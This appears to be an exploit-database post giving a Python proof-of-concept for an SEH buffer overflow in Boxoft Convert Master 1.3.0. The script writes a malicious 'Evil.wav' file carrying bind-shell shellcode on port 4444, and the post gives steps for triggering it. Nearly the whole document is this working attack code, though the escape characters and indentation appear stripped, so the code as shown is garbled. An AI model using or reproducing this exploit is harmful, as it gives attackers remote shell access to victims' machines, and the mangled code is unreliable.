Authored by Achilles

Boxoft Convert Master version 1.3.0 SEH local buffer overflow exploit.

# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64

# 1.- Run python code :Boxoft_Convert_Master.py
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell port 4444
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "x41" * 4132
nseh = "xebx06x90x90" #jmp short 6
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
nops = "x90" * 20
#Bind=shellcode port 4444
shellcode = ("xdaxd5xb8x9bx69x4dxa1xd9x74x24xf4x5ax33"
"xc9xb1x60x83xc2x04x31x42x15x03x42x15x79"
"x9cxf2x9bx0cxb0x35x05x03x97x32x91x2fx75"
"x92x10x7exdfxd5xdfx95x63xd0x24x96x1exca"
"xc6x57x4bxd9xe7x3cxe4x1cxa0xd9x7ex72xe4"
"x38x26xd1x92x88x79x63x55xe3x94xfex9axac"
"xb5xdexe4x35xbcxd0x9fxe6x92x63x51x5axaf"
"xadx1bxb0xf9x6ex46xacx68xa9x48xcexb8xe1"
"xd2xf5x1ax7dx84xdexb9x55xa0xe8xe3xd8xb2"
"x31xfbx1ax0bxeaxedxf4x8fxddxf5x55xbfx1a"
"xa5xe8xd8xfaxdex45x11x7cx4dxeax87x0fx9f"
"xe5xdfx90x18x7ex52x1bxd7x24x22xabx1bxda"
"x31xa2x75x8fxa3x13x99x20x5ex07x57x68x3e"
"x10xc7xc2xb0x2bxa0x13xd6x6ax3exc3x1ex99"
"x4fxf0xcex63x50xe3x90x80x3ex0ex9cx39x7e"
"x48xe6xf0xe7x3bxd3x7dxe3xa3x62x41xeex19"
"xd0xa8xc9xdbx02x93x0fx34xb0xadx81x08x57"
"xcexb8x38xfex13xc9xe7x40xc2x17xa6x3ax4c"
"x06x31xfcx3fx8fxcbx85x84x74x98x9cx63xe5"
"x46x2fxfcx15x3bx5cx37xd3x36xfcx39x3cx86"
"x29x32xbbxb3x04x13x6axd1xa7x55xacx8exa8"
"x05xafxc3xaex9dxc6x5fxa8x9dx8ex4ax25x3a"
"x35xa3xd7x4cxaaxb1x87xcax54x6dxdcxb2xf3"
"x3axaax29xeax44x01x4exb0x08x9axd0xb5x69"
"x42xe5xb4x5fx59xffxb4x90xe2x97x66x09x89"
"x87x8exffxa8x21x68x3fx01xe9xb3x27x63xd2"
"x93x2fx4dx9cx28x21xd4x9dxadx8fx24x19xc9"
"x98xbcx24x0bx47x84x9cx57xd2x20x79x71x67"
"xe0xd1xcdx40x51x7dxe2x39xa9xd2x92x4cx24"
"x59x7bxfdx89x6exeaxecxc8xacx54x8ax26x60"
"x81x38x06x32xabx56x1cxe7xd0x78xe5xa2x75"
"xc8x28x1bxd5x3fx51")
payload = buffer + nseh + seh + nops + shellcode

try:
f=open("Evil.wav","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"